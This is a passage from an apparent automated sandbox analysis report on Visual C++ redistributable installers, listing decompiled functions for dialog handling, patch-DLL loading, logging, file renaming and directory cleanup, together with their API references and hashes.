					EndDialog(_t71, ??);
					L15:
					_t30 = 1;
					L16:
					return E010062FF(_t30, _t59, _v8, _t64, _t71);
				}
				_t32 = _t27 - 0x100;
				if(_t32 == 0) {
					LoadStringA( *0x100c05c, 0x20000005,  &_v268, 0x104);
					_t59 = 0;
					SendMessageA(_t71, 0xc, 0,  &_v268);
					SendDlgItemMessageA(_t71, 0x67, 0xc, 0,  &_v268);
					SendDlgItemMessageA(_t71, 0x6c, 0xc, 0, "c:\4863269369430a9b27");
					goto L15;
				}
				if(_t32 != 1) {
					L6:
					_t30 = 0;
					goto L16;
				}
				_t42 = (_a12 & 0x0000ffff) - 1;
				if(_t42 == 0) {
					_v268 = 0;
					SendDlgItemMessageA(_t71, 0x6c, 0xd, 0x104,  &_v268);
					_push(E01003E3A( &_v268));
					goto L14;
				}
				_t47 = _t42 - 1;
				if(_t47 == 0) {
					goto L13;
				}
				if(_t47 == 0x6b) {
					_t59 = 0;
					_v268 = 0;
					LoadStringA( *0x100c05c, 0x20000005,  &_v528, 0x104);
					_t61 = 8;
					memset( &_v560, 0, _t61 << 2);
					_v552 =  &_v268;
					_v548 =  &_v528;
					_t55 =  &_v560;
					_v560 = _t71;
					_v544 = 1;
					__imp__SHBrowseForFolderA(_t55);
					if(_t55 != 0) {
						__imp__SHGetPathFromIDListA(_t55,  &_v268);
						if(_t55 != 0) {
							SendDlgItemMessageA(_t71, 0x6c, 0xc, 0,  &_v268);
						}
					}
					SendMessageA(_t71, 0x28, _t59, _t59);
					_t30 = 1;
					goto L16;
				}
				goto L6;
			}

0x01003e85
0x01003e8a
0x01003e90
0x01003e95
0x01003e99
0x01003fed
0x01003fed
0x01003fef
0x01003ff0
0x01003ff6
0x01003ff8
0x01003ff9
0x01004005
0x01004005
0x01003e9f
0x01003ea4
0x01003fb0
0x01003fbd
0x01003fc3
0x01003fdc
0x01003fe9
0x00000000
0x01003fe9
0x01003eab
0x01003ec4
0x01003ec4
0x00000000
0x01003ec4
0x01003eb1
0x01003eb2
0x01003f7d
0x01003f84
0x01003f96
0x00000000
0x01003f96
0x01003eb8
0x01003eb9
0x00000000
0x00000000
0x01003ec2
0x01003ee2
0x01003ee4
0x01003eea
0x01003ef4
0x01003efb
0x01003f03
0x01003f0f
0x01003f17
0x01003f1f
0x01003f25
0x01003f2b
0x01003f33
0x01003f3d
0x01003f45
0x01003f54
0x01003f54
0x01003f45
0x01003f5f
0x01003f65
0x00000000
0x01003f65
0x00000000

APIs

LoadStringA.USER32 ref: 01003EEA
SHBrowseForFolderA.SHELL32(?), ref: 01003F2B
SHGetPathFromIDListA.SHELL32(00000000,?), ref: 01003F3D
SendDlgItemMessageA.USER32(?,0000006C,0000000C,00000000,?), ref: 01003F54
SendMessageA.USER32 ref: 01003F5F
SendDlgItemMessageA.USER32(?,0000006C,0000000D,00000104,?), ref: 01003F84
LoadStringA.USER32 ref: 01003FB0
SendMessageA.USER32 ref: 01003FC3
SendDlgItemMessageA.USER32(?,00000067,0000000C,00000000,?), ref: 01003FDC
SendDlgItemMessageA.USER32(?,0000006C,0000000C,00000000,c:\4863269369430a9b27), ref: 01003FE9
EndDialog.USER32(?,00000000), ref: 01003FF0

Strings

c:\4863269369430a9b27, xrefs: 01003FDE

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: MessageSend$Item$LoadString$BrowseDialogFolderFromListPath
String ID: c:\4863269369430a9b27
API String ID: 4196404735-195655194
Opcode ID: 8ff38ef0283e2243d984189d5b9706cb04c242c77a24033a99f4f0c10035e197
Instruction ID: ca6d105f0d69831a8513d52e48f8c2b8b825066bcb4f2ed050d46bdd4aedea35
Opcode Fuzzy Hash: 8ff38ef0283e2243d984189d5b9706cb04c242c77a24033a99f4f0c10035e197
Instruction Fuzzy Hash: 1F416A75504219BEFB63DB649C8DFEE7BB8EB18300F0041A5B6C5E60C0DAB59A858F60

Uniqueness

Uniqueness Score: -1.00%

Function 0100360C Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 67
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0100360C(void* __ebx, void* __ecx, void* __edi, struct HINSTANCE__* _a4) {
				intOrPtr _v8;
				char _v268;
				char _v528;
				char _v788;
				void* __esi;
				intOrPtr _t11;
				void* _t25;
				void* _t29;
				void* _t31;

				_t25 = __ebx;
				_t11 =  *0x100c028; // 0xb636
				_v8 = _t11;
				_t12 = _a4;
				if( *0x100c044 == 0) {
					_push(_t31);
					if(E010061F9(__ecx, _t29, __edi, _t12, "options", "patchdll") == 0 || E010060BE(_t14, 1,  &_v528, 0x104) == 0) {
						GetSystemDirectoryA( &_v788, 0x104);
						_push( &_v268);
						_push("mspatcha.dll");
						_push( &_v788);
					} else {
						_push( &_v268);
						_push( &_v528);
						_push("c:\4863269369430a9b27");
					}
					E01002BC4();
					_t12 = LoadLibraryA( &_v268);
					 *0x100c058 = _t12;
					if(_t12 != 0) {
						 *0x100c044 = GetProcAddress(_t12, "GetFilePatchSignatureA");
						 *0x100c040 = GetProcAddress( *0x100c058, "ApplyPatchToFileA");
					}
					_pop(_t31);
					if( *0x100c044 == 0) {
						 *0x100c044 = 0x1003602;
					}
					if( *0x100c040 == 0) {
						 *0x100c040 = 0x10035f8;
					}
				}
				return E010062FF(_t12, _t25, _v8, _t29, _t31);
			}

0x0100360c
0x0100361e
0x01003623
0x01003626
0x01003629
0x0100362f
0x01003647
0x0100367a
0x01003686
0x01003687
0x01003692
0x0100365d
0x01003663
0x0100366a
0x0100366b
0x0100366b
0x01003693
0x0100369f
0x010036a7
0x010036ac
0x010036c7
0x010036ce
0x010036ce
0x010036da
0x010036db
0x010036dd
0x010036dd
0x010036ee
0x010036f0
0x010036f0
0x010036ee
0x01003703

APIs

GetSystemDirectoryA.KERNEL32 ref: 0100367A
LoadLibraryA.KERNEL32(?), ref: 0100369F
GetProcAddress.KERNEL32(00000000,GetFilePatchSignatureA), ref: 010036BA
GetProcAddress.KERNEL32(ApplyPatchToFileA), ref: 010036CC

Strings

patchdll, xrefs: 01003630
ApplyPatchToFileA, xrefs: 010036BC
GetFilePatchSignatureA, xrefs: 010036B4
options, xrefs: 01003635
c:\4863269369430a9b27, xrefs: 0100366B
mspatcha.dll, xrefs: 01003687

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: ApplyPatchToFileA$GetFilePatchSignatureA$c:\4863269369430a9b27$mspatcha.dll$options$patchdll
API String ID: 2141747552-3902076137
Opcode ID: d75fadbb291985e4ccfd5039247aea78be2d5ca5f0885812797b6874b77ceae2
Instruction ID: 86fcc2cc3a29359986d7a0763a20f979a07127794a10d9aeb92e6956b3d7621c
Opcode Fuzzy Hash: d75fadbb291985e4ccfd5039247aea78be2d5ca5f0885812797b6874b77ceae2
Instruction Fuzzy Hash: 012121B1900218AFFB37DBA9DD0DBD637ACBB09304F0085A5B6C997284D7B99684CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010033DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010033DB(void* __ecx, void* _a4) {
				long _v8;
				long _v12;
				void* _t10;
				intOrPtr* _t13;
				void* _t16;
				struct _OVERLAPPED* _t20;
				intOrPtr _t24;
				void* _t26;
				void _t27;
				void* _t30;
				void* _t34;

				_v12 = GetLastError();
				_t10 =  *0x100d044; // 0xffffffff
				_t20 = 0;
				if(_t10 == 0) {
					L7:
					_t20 = 1;
				} else {
					SetFilePointer(_t10, 0, 0, 2);
					_t13 = _a4;
					_t34 = _t13 + 1;
					do {
						_t24 =  *_t13;
						_t13 = _t13 + 1;
					} while (_t24 != 0);
					if(WriteFile( *0x100d044, _a4, _t13 - _t34,  &_v8, 0) != 0) {
						_t26 = "\r\n***\r\n\r\n";
						_t16 = _t26;
						_t30 = _t16 + 1;
						do {
							_t27 =  *_t16;
							_t16 = _t16 + 1;
						} while (_t27 != 0);
						if(WriteFile( *0x100d044, _t26, _t16 - _t30,  &_v8, 0) != 0) {
							goto L7;
						}
					}
				}
				SetLastError(_v12);
				return _t20;
			}

0x010033ea
0x010033ed
0x010033f2
0x010033f6
0x01003455
0x01003457
0x010033f8
0x010033fd
0x01003403
0x01003406
0x01003409
0x01003409
0x0100340b
0x0100340c
0x0100342b
0x0100342d
0x01003432
0x01003435
0x01003438
0x01003438
0x0100343a
0x0100343b
0x01003453
0x00000000
0x00000000
0x01003453
0x0100342b
0x0100345b
0x01003466

APIs

GetLastError.KERNEL32(76CDF560,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200,?), ref: 010033E4
SetFilePointer.KERNEL32(FFFFFFFF,00000000,00000000,00000002,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200), ref: 010033FD
WriteFile.KERNEL32(?,?,00000000,00000000,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200), ref: 01003427
WriteFile.KERNEL32(***,***,00000000,00000000,?,?,?,?,?,010034CC,?,?,?,010038D5,?,?), ref: 0100344E
SetLastError.KERNEL32(?,?,?,?,?,010034CC,?,?,?,010038D5,?,?,00000200,?), ref: 0100345B

Strings

***, xrefs: 0100342D, 01003446, 01003447

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: File$ErrorLastWrite$Pointer
String ID: ***
API String ID: 1741213463-1787515470
Opcode ID: f259f0daa3fa8cc644dd96105249b9c34566c8285c111745a810dfbc4c84cd6b
Instruction ID: 44ff794e02d1a3db74c08f5772ca78b3d7dcc110a49943917282bb4f95e92f64
Opcode Fuzzy Hash: f259f0daa3fa8cc644dd96105249b9c34566c8285c111745a810dfbc4c84cd6b
Instruction Fuzzy Hash: 4211E5B5600108BFEB138FE8DC8CDAA3FADEB49240F014165BB81DB155EA76AD09C760

Uniqueness

Uniqueness Score: -1.00%

Function 010044AD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E010044AD(intOrPtr* _a4, CHAR* _a8) {
				intOrPtr* _t6;
				char* _t7;
				void* _t14;
				char _t16;
				void* _t23;
				char* _t26;
				CHAR* _t27;
				void* _t28;

				_t6 = _a4;
				_t27 = _a8;
				_t14 = 0;
				_t23 = _t27 - _t6;
				do {
					_t16 =  *_t6;
					 *((char*)(_t23 + _t6)) = _t16;
					_t6 = _t6 + 1;
				} while (_t16 != 0);
				_t7 = strrchr(_t27, 0x2e);
				_t26 = _t7;
				if(_t26 == 0) {
					L7:
					 *_t27 = 0;
				} else {
					__imp___stricmp(_t26, ".sys");
					if(_t7 != 0) {
						goto L7;
					} else {
						_t14 = 1;
						do {
							 *0x101d3e8 =  *0x101d3e8 + 1;
							sprintf(_t26, ".%03u",  *0x101d3e8 % 0x3e8);
							_t28 = _t28 + 0xc;
						} while (GetFileAttributesA(_t27) != 0xffffffff);
						E0100447F(0x100c004, _t27);
					}
				}
				return _t14;
			}

0x010044b2
0x010044b7
0x010044bc
0x010044bf
0x010044c1
0x010044c1
0x010044c3
0x010044c6
0x010044c7
0x010044ce
0x010044d4
0x010044da
0x0100452e
0x0100452e
0x010044dc
0x010044e2
0x010044ec
0x00000000
0x010044ee
0x010044f0
0x010044f1
0x010044ff
0x0100450c
0x01004512
0x0100451c
0x01004527
0x01004527
0x010044ec
0x01004537

APIs

strrchr.MSVCRT ref: 010044CE
_stricmp.MSVCRT(00000000,.sys), ref: 010044E2
sprintf.MSVCRT ref: 0100450C
GetFileAttributesA.KERNEL32(?), ref: 01004516

Strings

.%03u, xrefs: 01004506
.sys, xrefs: 010044DC

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: AttributesFile_stricmpsprintfstrrchr
String ID: .%03u$.sys
API String ID: 3323407637-674990528
Opcode ID: 1ff158e2bc5fa47faf8acc8ac29c6469c21ce8e7ed94fe9ef2c6fd643a7bfcd0
Instruction ID: 49d5ea88e9c73088097ed9a15219229db482fa6d83c04b0c91c0a0ec1b993438
Opcode Fuzzy Hash: 1ff158e2bc5fa47faf8acc8ac29c6469c21ce8e7ed94fe9ef2c6fd643a7bfcd0
Instruction Fuzzy Hash: 9D0190352042005FF3134B6DAC889A73BE9DFCA622F10812EF7C4C31C1CE7588018364

Uniqueness

Uniqueness Score: -1.00%

Function 01003892 Relevance: 7.5, APIs: 5, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01003892(int _a4) {
				char _v132;
				char _v644;
				void* _t19;
				int _t20;

				_t20 = _a4;
				if(_t20 == 0xffffffff) {
					_t20 = GetLastError();
				}
				if( *0x101d3e0 == 0) {
					E01002D09(_t20, 0x200,  &_v644);
					E0100346E(_t19,  &_v644);
					_v132 = 0;
					LoadStringA( *0x100c05c, 0x20000003,  &_v132, 0x80);
					MessageBoxA( *0x100ce04,  &_v644,  &_v132, 0x10010);
				}
				E01002D78();
				if(_t20 == 0) {
					_t20 = _t20 + 1;
				}
				if( *0x100c060 != 0) {
					DeleteCriticalSection(0x100d060);
					 *0x100c060 =  *0x100c060 & 0x00000000;
				}
				ExitProcess(_t20);
			}

0x0100389e
0x010038a4
0x010038ac
0x010038ac
0x010038b5
0x010038c4
0x010038d0
0x010038e9
0x010038ed
0x01003909
0x01003909
0x0100390f
0x01003916
0x01003918
0x01003918
0x01003920
0x01003927
0x0100392d
0x0100392d
0x01003935

APIs

GetLastError.KERNEL32 ref: 010038A6
LoadStringA.USER32 ref: 010038ED
MessageBoxA.USER32 ref: 01003909
DeleteCriticalSection.KERNEL32(0100D060), ref: 01003927
ExitProcess.KERNEL32 ref: 01003935

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CriticalDeleteErrorExitLastLoadMessageProcessSectionString
String ID:
API String ID: 3880362259-0
Opcode ID: 0930090407c2940a87bd685511672d1101a90b25c2312edca6e979305b6cca41
Instruction ID: 95fc673a3485858558866d3e75a01873537341b781b9074dca4c1e746b7b8f2d
Opcode Fuzzy Hash: 0930090407c2940a87bd685511672d1101a90b25c2312edca6e979305b6cca41
Instruction Fuzzy Hash: C2018435401118AFFB73EBA4DD8CBE977B8BB04315F140295FAC0A60C4DB795A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0100628C Relevance: 7.5, APIs: 5, Instructions: 36
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100628C() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t17;

				_t7 =  *0x100c028; // 0xb636
				if(_t7 == 0 || _t7 == 0xbb40) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t7 = (_v16 ^ _v20.LowPart ^ _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11) & 0x0000ffff;
					if(_t7 == 0) {
						_t7 = 0xbb40;
					}
					 *0x100c028 = _t7;
				}
				_t17 =  !_t7;
				 *0x100c024 = _t17;
				return _t17;
			}

0x01006294
0x0100629b
0x010062a9
0x010062b5
0x010062bd
0x010062c5
0x010062d1
0x010062df
0x010062e5
0x010062e7
0x010062e7
0x010062ec
0x010062ec
0x010062f1
0x010062f3
0x010062f9

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 010062A9
GetCurrentProcessId.KERNEL32 ref: 010062B5
GetCurrentThreadId.KERNEL32 ref: 010062BD
GetTickCount.KERNEL32 ref: 010062C5
QueryPerformanceCounter.KERNEL32(?), ref: 010062D1

Memory Dump Source

Source File: 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, Offset: 01000000, based on PE: true

Associated: 0000001F.00000002.429854293.0000000001000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429872617.000000000100C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001F.00000002.429881349.000000000101E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_1000000_vcredist_2010_x64.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 9f9a8a372e71f4ba5fd6d590d704713b28d7a18848ebf7ccacbe1fec22a7f2bd
Instruction ID: cb9998d7c512c76f87658832ca3486ab159dbae6228a0cd13093ddd9b699de7a
Opcode Fuzzy Hash: 9f9a8a372e71f4ba5fd6d590d704713b28d7a18848ebf7ccacbe1fec22a7f2bd
Instruction Fuzzy Hash: 00F03C36D002189BEB22EBF8E44C59AB7F9EF0C310F4106A1F591E7146DB3AE900CB80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vcredist_2013_x64.exePID: 6716, Parent PID: 6280COMMON

Executed Functions

Function 012B66A3 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 325
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E012B66A3(void* __edx, WCHAR* _a4, signed int _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1078;
				intOrPtr _v1592;
				intOrPtr _v1594;
				struct _WIN32_FIND_DATAW _v1640;
				int _v1644;
				WCHAR* _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t76;
				long _t88;
				signed int _t95;
				void* _t97;
				void* _t98;
				signed int _t102;
				int _t118;
				signed int _t124;
				void* _t127;
				signed int _t129;
				WCHAR* _t138;
				void* _t148;
				signed int _t155;
				void* _t160;

				_t148 = __edx;
				_t76 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t76 ^ _t155;
				_v1652 = _v1652 | 0xffffffff;
				_t149 = 0;
				_t138 = _a4;
				_v1648 = _t138;
				_v1664 = 0 | (_a8 & 0x00000001) == 0x00000001;
				_v1644 = 0;
				_v1668 = 0 | (_a8 & 0x00000002) == 0x00000002;
				_t160 = (_a8 & 0x00000004) - 4;
				_t145 = 0 | _t160 == 0x00000000;
				_v1656 = _t160 == 0;
				E012A7E30( &_v1048, 0, 0x208);
				E012A7E30( &_v528, 0, 0x208);
				_t88 = GetFileAttributesW(_t138); // executed
				_v1660 = _t88;
				if(_t88 != 0xffffffff) {
					L8:
					if((_v1660 & 0x00000010) == 0) {
						_t149 = 0x8000ffff;
						L85:
						if(_v1652 != 0xffffffff) {
							FindClose(_v1652);
						}
						L87:
						if(_v1644 != 0) {
							E012B01E8(_v1644);
						}
						return E012A7EAA(_t149, 0xffff, _v8 ^ _t155, _t148, _t149, 0x80070000);
					}
					if((_v1660 & 0x00000001) == 0 || SetFileAttributesW(_v1648, 0x80) != 0) {
						if(_v1664 != 0 || _v1668 != 0) {
							if(_v1656 == 0 || GetTempPathW(0x104,  &_v1048) != 0) {
								_t95 = E012B201F(_t145, _t148, _v1648, L"*.*",  &_v1644);
								_t149 = _t95;
								if(_t95 < 0) {
									goto L87;
								}
								_t97 = FindFirstFileW(_v1644,  &_v1640);
								_v1652 = _t97;
								if(_t97 != 0xffffffff) {
									do {
										_t98 = 0x2e;
										if(_t98 != _v1640.cFileName) {
											L36:
											_v1078 = 0;
											_t102 = E012B201F(_t145, _t148, _v1648,  &(_v1640.cFileName),  &_v1644);
											_t149 = _t102;
											if(_t102 < 0) {
												goto L85;
											}
											if(_v1668 == 0 || (_v1640.dwFileAttributes & 0x00000010) == 0) {
												if(_v1664 == 0) {
													goto L51;
												}
												if((_v1640.dwFileAttributes & 0x00000007) == 0 || SetFileAttributesW(_v1644, 0x80) != 0) {
													if(DeleteFileW(_v1644) != 0) {
														goto L51;
													}
													if(_v1656 == 0) {
														_t106 = GetLastError();
														if(_t106 > 0) {
															_t106 = _t106 & 0x0000ffff | 0x80070000;
														}
														_t149 = _t106;
														if(_t149 >= 0) {
															_t149 = 0x80004005;
														}
														_push(_t149);
														_push(0x12d);
														goto L63;
													}
													if(GetTempFileNameW( &_v1048, L"DEL", 0,  &_v528) == 0) {
														_t106 = GetLastError();
														if(_t106 > 0) {
															_t106 = _t106 & 0x0000ffff | 0x80070000;
														}
														_t149 = _t106;
														if(_t149 >= 0) {
															_t149 = 0x80004005;
														}
														_push(_t149);
														_push(0x11d);
														goto L63;
													}
													_t118 = MoveFileExW(_v1644,  &_v528, 1);
													_push(4);
													_push(0);
													if(_t118 == 0) {
														_push(_v1644);
													} else {
														_push( &_v528);
													}
													MoveFileExW();
													goto L51;
												} else {
													_t106 = GetLastError();
													if(_t106 > 0) {
														_t106 = _t106 & 0x0000ffff | 0x80070000;
													}
													_t149 = _t106;
													if(_t149 >= 0) {
														_t149 = 0x80004005;
													}
													_push(_t149);
													_push(0x113);
													goto L63;
												}
											} else {
												_t124 = E012B1E29(_t145, 0,  &_v1644);
												_t149 = _t124;
												if(_t124 < 0) {
													goto L85;
												}
												E012B66A3(_t148, _v1644, _a8);
												goto L51;
											}
										}
										if(0 == _v1594) {
											goto L51;
										}
										_t127 = 0x2e;
										if(_t127 != _v1594 || 0 != _v1592) {
											goto L36;
										}
										L51:
									} while (FindNextFileW(_v1652,  &_v1640) != 0);
									if(GetLastError() != 0x12) {
										_t106 = GetLastError();
										if(_t106 > 0) {
											_t106 = _t106 & 0x0000ffff | 0x80070000;
										}
										_t149 = _t106;
										if(_t149 >= 0) {
											_t149 = 0x80004005;
										}
										_push(_t149);
										_push(0x13a);
										goto L63;
									}
									_t149 = 0;
									goto L54;
								}
								_t129 = GetLastError();
								if(_t129 > 0) {
									_t129 = _t129 & 0x0000ffff | 0x80070000;
								}
								_t149 = _t129;
								if(_t149 >= 0) {
									_t149 = 0x80004005;
								}
								_push(_t149);
								_push(0xef);
							} else {
								_t129 = GetLastError();
								if(_t129 > 0) {
									_t129 = _t129 & 0x0000ffff | 0x80070000;
								}
								_t149 = _t129;
								if(_t149 >= 0) {
									_t149 = 0x80004005;
								}
								_push(_t149);
								_push(0xe4);
							}
							goto L7;
						} else {
							L54:
							if(RemoveDirectoryW(_v1648) != 0) {
								goto L85;
							}
							_t106 = GetLastError();
							if(_t106 > 0) {
								_t106 = _t106 & 0x0000ffff | 0x80070000;
							}
							_t149 = _t106;
							if(_t149 != 0x80070020) {
								L61:
								if(_t149 >= 0) {
									goto L85;
								}
								goto L62;
							} else {
								if(_v1656 == 0 || MoveFileExW(_v1648, 0, 4) == 0) {
									L62:
									_push(_t149);
									_push(0x149);
									L63:
									_push("dirutil.cpp");
									E012B294E(_t106);
									goto L85;
								} else {
									_t149 = 0;
									goto L61;
								}
							}
						}
					} else {
						_t129 = GetLastError();
						if(_t129 > 0) {
							_t129 = _t129 & 0x0000ffff | 0x80070000;
						}
						_t149 = _t129;
						if(_t149 >= 0) {
							_t149 = 0x80004005;
						}
						_push(_t149);
						_push(0xd9);
						L7:
						_push("dirutil.cpp");
						E012B294E(_t129);
						goto L87;
					}
				}
				_t129 = GetLastError();
				if(_t129 == 2) {
					_t129 = 3;
				}
				if(_t129 > 0) {
					_t129 = _t129 & 0x0000ffff | 0x80070000;
				}
				_t149 = _t129;
				if(_t149 >= 0) {
					goto L8;
				} else {
					_push(_t149);
					_push(0xd0);
					goto L7;
				}
			}

0x012b66a3
0x012b66ac
0x012b66b3
0x012b66b9
0x012b66c8
0x012b66d2
0x012b66df
0x012b66e5
0x012b66f8
0x012b66fe
0x012b6706
0x012b6708
0x012b6712
0x012b6718
0x012b6726
0x012b672f
0x012b6735
0x012b6748
0x012b677b
0x012b6782
0x012b6ad5
0x012b6ada
0x012b6ae1
0x012b6ae9
0x012b6ae9
0x012b6aef
0x012b6af6
0x012b6afe
0x012b6afe
0x012b6b13
0x012b6b13
0x012b678f
0x012b67cf
0x012b67e3
0x012b6831
0x012b6836
0x012b683a
0x00000000
0x00000000
0x012b684d
0x012b6853
0x012b685c
0x012b6882
0x012b6884
0x012b688c
0x012b68b8
0x012b68ba
0x012b68d5
0x012b68da
0x012b68de
0x00000000
0x00000000
0x012b68ec
0x012b6926
0x00000000
0x00000000
0x012b6933
0x012b695c
0x00000000
0x00000000
0x012b6964
0x012b6a94
0x012b6a9c
0x012b6aa0
0x012b6aa0
0x012b6aa2
0x012b6aa6
0x012b6aa8
0x012b6aa8
0x012b6aad
0x012b6aae
0x00000000
0x012b6aae
0x012b6986
0x012b6a73
0x012b6a7b
0x012b6a7f
0x012b6a7f
0x012b6a81
0x012b6a85
0x012b6a87
0x012b6a87
0x012b6a8c
0x012b6a8d
0x00000000
0x012b6a8d
0x012b69a1
0x012b69a3
0x012b69a5
0x012b69a9
0x012b69b4
0x012b69ab
0x012b69b1
0x012b69b1
0x012b69ba
0x00000000
0x012b6a52
0x012b6a52
0x012b6a5a
0x012b6a5e
0x012b6a5e
0x012b6a60
0x012b6a64
0x012b6a66
0x012b6a66
0x012b6a6b
0x012b6a6c
0x00000000
0x012b6a6c
0x012b68f7
0x012b68fe
0x012b6903
0x012b6907
0x00000000
0x00000000
0x012b6916
0x00000000
0x012b6916
0x012b68ec
0x012b6897
0x00000000
0x00000000
0x012b689f
0x012b68a7
0x00000000
0x00000000
0x012b69bc
0x012b69cf
0x012b69e2
0x012b6ab5
0x012b6ab9
0x012b6abd
0x012b6abd
0x012b6abf
0x012b6ac3
0x012b6ac5
0x012b6ac5
0x012b6aca
0x012b6acb
0x00000000
0x012b6acb
0x012b69e8
0x00000000
0x012b69e8
0x012b685e
0x012b6866
0x012b686a
0x012b686a
0x012b686c
0x012b6870
0x012b6872
0x012b6872
0x012b6877
0x012b6878
0x012b67fb
0x012b67fb
0x012b6803
0x012b6807
0x012b6807
0x012b6809
0x012b680d
0x012b680f
0x012b680f
0x012b6814
0x012b6815
0x012b6815
0x00000000
0x012b69ea
0x012b69ea
0x012b69f8
0x00000000
0x00000000
0x012b69fe
0x012b6a06
0x012b6a0a
0x012b6a0a
0x012b6a0c
0x012b6a14
0x012b6a35
0x012b6a37
0x00000000
0x00000000
0x00000000
0x012b6a16
0x012b6a1d
0x012b6a3d
0x012b6a3d
0x012b6a3e
0x012b6a43
0x012b6a43
0x012b6a48
0x00000000
0x012b6a33
0x012b6a33
0x00000000
0x012b6a33
0x012b6a1d
0x012b6a14
0x012b67a6
0x012b67a6
0x012b67ae
0x012b67b2
0x012b67b2
0x012b67b4
0x012b67b8
0x012b67ba
0x012b67ba
0x012b67bf
0x012b67c0
0x012b676c
0x012b676c
0x012b6771
0x00000000
0x012b6771
0x012b678f
0x012b674a
0x012b6753
0x012b6757
0x012b6757
0x012b675a
0x012b675e
0x012b675e
0x012b6760
0x012b6764
0x00000000
0x012b6766
0x012b6766
0x012b6767
0x00000000
0x012b6767

APIs

_memset.LIBCMT ref: 012B6718
_memset.LIBCMT ref: 012B6726
GetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,00000000), ref: 012B672F
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B674A
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,?,00000000), ref: 012B679C
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 012B67A6
